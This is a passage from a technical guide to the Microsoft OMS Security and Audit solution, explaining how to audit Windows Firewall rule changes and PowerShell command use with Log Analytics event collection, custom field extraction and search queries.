Note: This feature heavily relies on configuring AppLocker policies and enabling security event 4688 with process command line field. Process command line field is available from Windows Server 2012 R2, Windows 8.1 and above. More information can be found at https://technet.microsoft.com/en-us/itpro/windows/keep-secure/event-4688

As the list of detections is not disclosed, it is hard to simulate a detection. There are a few known detections, like masking an exe file with a double extension, as shown in Figure 59.

FIGURE 59. SUSPICIOUS DOUBLE EXTENSION FILE DETECTION

Threat Intelligence

Threat intelligence is the same feature described earlier. In this group, you have quick access to the world map with the incoming and outgoing malicious traffic, as well some breakdowns of the threats, as shown in Figure 60.

FIGURE 60. THREAT INTELLIGENCE GROUP DASHBOARDS

Advanced Audit Scenarios

The capabilities in Log Analytics, like Log Management, can be used to provide auditing on other services that are not available out of the box in Security and Audit. In this section, we will show how we can provide auditing for Windows Firewall configuration and PowerShell.

Note: When you setup these advanced scenarios their usage will count against Insights & Analytics offering when per node licensing is chosen.

Audit Windows Firewall Configuration

Follow these steps to configure and use Windows Firewall Configuration auditing.

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. Go to Settings.
  3. Click on the Data tab. Choose Windows Event logs.
  4. Under Collect events from the following event logs, enter Microsoft-WindowsWindows Firewall With Advanced Security/Firewall and click on the plus sign to add.
  5. Check the Error, Warning, and Information checkboxes for that log, as shown in Figure 61. Click Save to save your changes.

FIGURE 61. ADDING WINDOWS FIREWALL LOG

  1. Wait for 10 to 20 minutes until this configuration is distributed to the machines connected to OMS.
  2. Logon to a server connected to OMS.
    1. Start the Windows Firewall with Advanced Security console, as shown in Figure 62.

FIGURE 62. WINDOWS FIREWALL WITH ADVANCED SECURITY CONSOLE

  1. Click on Inbound rules.
  2. Select and right-click on a rule like COM+ Remote Administration and Enable it.
  3. Browse to the OMS portal at https://www.mms.microsoft.com.
  4. Click on Log Search.
  5. In the Search bar, type the query below and press Enter.

Type=Event EventLog="Microsoft-Windows-Windows Firewall With Advanced Security/Firewall" EventID=2005

  1. A log entry with the rule that was modified in step 10 will appear, as shown in Figure 63.

FIGURE 63. WINDOWS FIREWALL CONFIGURATION LOG

  1. The data can be modified with the custom fields feature for better searching.
  2. Click on the hamburger menu in front of Parameter 'XML value' and select extract fields from 'Event', as shown in Figure 64.

FIGURE 64. EXTRACT FIELDS

  1. On the Extract Fields page select the value for Rule name, as shown in Figure 65.

Give a name to the field, like FirewallRuleName_CF and click Extract.

FIGURE 65. EXTRACT FIREWALL RULE NAME FIELD

  1. Click Save Extraction.
  2. Repeat steps 16 to 18, but this time selecting the user value, as shown in Figure 66, and giving a name like User_CF to the field.

FIGURE 66. EXTRACT FIREWALL RULE USER FIELD

  1. These newly created fields will be populated on new data only.
  2. Wait 10 minutes, logon on the same server from step 7 and disable the rule from step 10.
  3. Browse to the OMS portal at https://www.mms.microsoft.com.
  4. Click on Log Search.
  5. In the Search bar, type the query below and press Enter.

Type=Event EventLog="Microsoft-Windows-Windows Firewall With Advanced Security/Firewall" EventID=2005

  1. A log for the disabled rule should appear with the custom fields populated, as shown in Figure 67. The created custom fields can be used for scoping or aggregating the audit data for Windows Firewall Configuration.

FIGURE 67. CUSTOM FIELDS POPULATED

You can extract more fields from the same log. For example, you can extract if the rule has been enabled during the modification or it has been disable. Active field with value 1 is enabled and value 0 is disabled.

Audit PowerShell

PowerShell can be audited with Log Analytics through some simple steps. As a result, you will be able to see what PowerShell commands are executed in your environment and by whom.

Follow these steps to audit PowerShell.

  1. Logon to an Active Directory domain controller into your environment.
  2. Start the Group Policy Management console.
  3. Expand the Group Policy Object folder.
  4. Right-click on Default Domain Policy and select Edit.
  5. Expand Computer Configuration, Policies, Administrative Templates, Windows Components, Windows PowerShell.
  6. Double-click on Turn On Module Logging policy.
  7. Select the Enabled option.
  8. Click on the Show button.
  9. In the empty field enter *, as shown in Figure 68. Click OK and OK again to complete.

Note: Character * enables audit logs for all PowerShell commands. If you want to enable logging for specific PowerShell modules, you can enter names of the modules, such as ActiveDirectory.

FIGURE 68. TURN ON MODULE LOGGING POLICY

  1. Repeat steps from 4 to 9 for the Default Domain Controller Policy.
  2. Close the Group Policy Management Editor.
  3. Wait until the policy is applied to all servers.
  4. Browse to the OMS portal at https://www.mms.microsoft.com.
  5. Click on Settings.
  6. Click on Data tab. Choose Windows Event logs.
  7. Under 'Collect events from the following event logs' enter Microsoft-WindowsPowerShell/Operational and click on the plus sign to add.
  8. Check Error, Warning, and Information for that log, as shown in Figure 69. Click Save to save your changes.

FIGURE 69. ADDING POWERSHELL AUDIT LOG

  1. Wait from 10 to 20 minutes until this change is distributed to OMS connected machines.
  2. Logon to a server connected to OMS.
  3. Execute PowerShell command like Get-Command.
  4. Browse to the OMS portal at https://www.mms.microsoft.com.
  5. Click on Log Search.
  6. Type the query below in search bar and press Enter.

Type=Event EventLog="Microsoft-Windows-PowerShell/Operational" EventID=4103

  1. This query will return PowerShell audit logs, as shown in Figure 70.

FIGURE 70. POWERSHELL AUDIT LOGS

  1. The data can be modified with custom fields feature for better searching.
  2. Click on the hamburger menu in front of Parameter XML value and select extract fields from 'Event', as shown in Figure 71.

FIGURE 71. EXTRACT FIELDS

  1. On Extract Fields page select the value for User, as shown in Figure 72. Give it name to the field like PowerShellUser_CF and click Extract.

FIGURE 72. EXTRACT FIELDS

  1. Click Save Extraction.
  2. Repeat steps 25 to 27, but this time selecting the Command Name value, as shown in Figure 73, and giving a name like PowerShellCommand_CF to the field.

FIGURE 73. EXTRACT POWERSHELL COMMAND FIELD

  1. If needed correct some as the results, as shown in Figure 74.

FIGURE 74. FINE-TUNING EXTRACTION

  1. Correct extraction should look like the results shown in Figure 75.

FIGURE 75. CORRECT EXTRACTION

  1. These newly created fields will be populated on new data only.
  2. Logon to a OMS connected server and executed several PowerShell Commands.
  3. Browse to the OMS portal at https://www.mms.microsoft.com.
  4. Click on Log Search.
  5. In the Search bar, type the query below and press Enter. Note that we are excluding the system user for more granular results.

Type=Event EventLog="Microsoft-Windows-PowerShell/Operational" EventID=4103 PowerShellUser_CF!="CLOUDADMINISTRA\\SYSTEM" | measure count() by PowerShellUser_CF

  1. The query will return results with the number of commands each user has executed, as shown in Figure 76.

FIGURE 76. NUMBER OF POWERSHELL COMMANDS PER USER

  1. In the Search bar, type the query below and press Enter.

Type=Event EventLog="Microsoft-Windows-PowerShell/Operational" EventID=4103 PowerShellUser_CF!="CLOUDADMINISTRA\\SYSTEM" | measure count() by PowerShellCommand_CF

  1. The query will return results with how many times a PowerShell command has been executed, as shown in Figure 77.

FIGURE 77. POWERSHELL COMMAND EXECUTION COUNT

  1. When we click on 'Restart-Computer' result we can see who has executed that command, as shown in Figure 78.

FIGURE 78. RESTART-COMPUTER COMMAND LOG

Summary

Security is a topic that every person in an organization should be concerned about. Preventing or stopping a security breach is key for the success of your organization.

In this chapter, we have demonstrated the Security and Audit solution in OMS. We have shown how to configure it and take full advantage of its features, integrations, and extensibility in protecting and auditing your organization. We hope you will use the hands-on examples provided in this chapter and continue further exploration of the service in the context of security. In the next chapter, we will explore Protection and Recovery in OMS.